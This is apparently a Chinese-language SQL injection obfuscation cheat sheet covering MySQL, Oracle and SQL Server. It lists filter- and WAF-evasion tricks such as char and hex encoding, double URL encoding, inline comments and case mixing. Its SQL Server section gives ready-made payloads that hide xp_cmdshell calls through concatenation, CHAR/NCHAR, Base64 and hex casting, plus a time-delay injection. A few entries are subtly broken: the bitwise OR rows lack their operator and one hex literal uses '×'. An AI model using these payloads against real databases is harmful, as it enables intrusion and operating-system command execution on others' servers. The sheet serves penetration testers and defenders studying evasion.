注入混淆
MySQL
| 描述 | 查询语句 |
|---|---|
|
ASCII > 字符 |
SELECT char(65) |
|
字符 > ASCII |
SELECT ascii('A') |
|
十六进制 |
SELECT 0x4A414B45 |
|
十六进制 > 整数 |
SELECT 0x20 + 0x40 |
|
非十六进制/十六进制 |
unhex(hex(user())) |
|
按位与 |
SELECT 6 & 2 |
|
按位或 |
SELECT 6 |
|
按位取反 |
SELECT ~6 |
|
按位异或 |
SELECT 6 ^ 2 |
|
右移 |
SELECT 6>>2 |
|
左移 |
SELECT 6<<2 |
|
字符串 |
SELECT substr('abcd', 3, 2) substr(string, index, length) |
|
Cast |
SELECT cast('1' AS unsigned integer) SELECT cast('123' AS char) |
|
Concat |
SELECT concat('snow','wolf') SELECT 'snow' 'wo' 'lf' |
|
无引号 |
SELECT CONCAT(CHAR(74),CHAR(65),CHAR(75),CHAR(69)) |
|
注释块 |
SELECT/*block
comment*/"test" |
|
单行注释 |
注释掉该行的其余部分 SELECT 1 -- |
|
内联注释 |
SEL/*_*/ECT * FR/*_*/OM |
|
无空格 |
SELECT(username)FROM(USERS)WHERE(username='snowwolf') |
|
允许的空格 |
09, 0A, 0B, 0C, 0D, A0, 20 |
|
URL Encode |
SELECT%20%2A%20FROM%20USERS |
|
两次URL Encode |
SELECT%2520%2A%2520FROM%2520USERS |
|
无效百分比编码 |
%SEL%ECT * F%R%OM U%S%ERS |
|
字符串混淆 |
SeLeCt * FrOm |
Oracle
| 描述 | 查询语句 |
|---|---|
|
ASCII转字符 |
SELECT char(65) from dual |
|
字符转ASCII |
SELECT ascii('A') from dual |
|
按位与 |
SELECT 6 & 2 from dual |
|
按位或 |
SELECT 6 from dual |
|
按位取反 |
SELECT ~6 from dual |
|
按位异或 |
SELECT 6 ^ 2 from dual |
|
选择指定字符 |
SELECT substr('abcd', 3, 1) FROM dual; |
|
字符串 |
SELECT substr('abcd', 3, 2) from dual
substr(string, index, length) |
|
Cast |
select CAST(12 AS CHAR(32)) from dual |
|
Concat |
SELECT concat('net','spi') from dual |
|
注释 |
SELECT 1 FROM dual -- |
|
IF语句 |
BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; |
|
Case语句 |
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- Returns 1 |
|
延时 |
BEGIN DBMS_LOCK.SLEEP(5); END; (Requires Privileges) |
|
指定行 |
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; |
|
按位与 |
SELECT bitand(6,2) FROM dual; -- Returns 2 |
|
字符串拼接 |
SELECT 'A' || 'B' FROM dual; -- Returns AB |
|
规避引号 |
SELECT chr(65) || chr(66) FROM dual; -- Returns AB |
|
十六进制加密 |
SELECT 0x75736572 FROM dual; |
SQL Server
| 描述 | 查询语句 |
|---|---|
|
ASCII转字符 |
SELECT char(65) |
|
字符转ASCII |
SELECT ascii('A') |
|
十六进制转整数 |
SELECT 0x20 + 0x40 |
|
按位与 |
SELECT 6 & 2 |
|
按位或 |
SELECT 6 |
|
按位取反 |
SELECT ~6 |
|
按位异或 |
SELECT 6 ^ 2 |
|
字符串 |
SELECT substring('abcd', 3, 2) substring(string, index, length) |
|
Cast |
SELECT cast('1' AS unsigned integer) SELECT cast('123' AS char) |
|
Concat |
SELECT concat('snow','wolf') |
|
注释 |
SELECT 1 --comment
SELECT/*comment*/1 |
|
规避引号 |
SELECT char(65)+char(66) -- returns AB |
|
规避分号 |
%0dwaitfor+delay+'0:0:10'-- |
|
绕过Case过滤 |
EXEC xP_cMdsheLL 'dir'; |
- 避免空格:
EXEC/**/xp_cmdshell/**/'dir';--
';ex/**/ec xp_cmds/**/hell 'dir';- 通过concat避免查询检测:
DECLARE @cmd as varchar(3000);SET @cmd = 'x'+'p'+'_'+'c'+'m'+'d'+'s'+'h'+'e'+'l'+'l'+'/**/'+""+'d'+'i'+'r'+"";exec(@cmd);- 通过字符编码避免查询检测:
DECLARE @cmd as varchar(3000);SET @cmd =(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+CHAR(97)+CHAR(115)+CHAR(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+CHAR(109)+CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+CHAR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));EXEC(@cmd);- 通过Base64规避查询检测:
DECLARE @data varchar(max), @XmlData xml;SET @data = 'ZXhlYyBtYXN0ZXIuLnhwX2NtZHNoZWxsICdkaXIn';SET @XmlData = CAST('' + @data + '' as xml);SET @data = CONVERT(varchar(max), @XmlData.value('(data)[1]', 'varbinary(max)'));exec (@data);- 通过Nchar加密规避查询检测:
DECLARE @cmd as nvarchar(3000);SET @cmd =(nchar(101)+nchar(120)+nchar(101)+nchar(99)+nchar(32)+nchar(109)+nchar(97)+nchar(115)+nchar(116)+nchar(101)+nchar(114)+nchar(46)+nchar(46)+nchar(120)+nchar(112)+nchar(95)+nchar(99)+nchar(109)+nchar(100)+nchar(115)+nchar(104)+nchar(101)+nchar(108)+nchar(108)+nchar(32)+nchar(39)+nchar(100)+nchar(105)+nchar(114)+nchar(39)+nchar(59));EXEC(@cmd);- 通过二进制编码ASCII+Cast来规避查询检测:
DECLARE @cmd as varchar(MAX);SET @cmd = cast(0x78705F636D647368656C6C202764697227 as varchar(MAX));exec(@cmd);- 通过二进制编码ASCII+Convert来规避查询检测:
DECLARE @cmd as varchar(MAX);SET @cmd = convert(varchar(MAX),0x78705F636D647368656C6C202764697227);exec(@cmd);- 通过varbinary来规避查询检测:
DECLARE @cmd as varchar(MAX);SET @cmd = convert(varchar(0),0x78705F636D647368656C6C202764697227);exec(@cmd);- 通过使用sp_sqlexec规避执行:
DECLARE @cmd as varchar(3000);SET @cmd = convert(varchar(0),0×78705F636D647368656C6C202764697227);exec sp_sqlexec @cmd;- 执行xp_cmdshell ‘dir’:
DECLARE @tmp as varchar(MAX);
SET @tmp = char(88)+char(80)+char(95)+char(67)+char(77)+char(68)+char(83)+char(72)+char(69)+char(76)+char(76);
exec @tmp 'dir';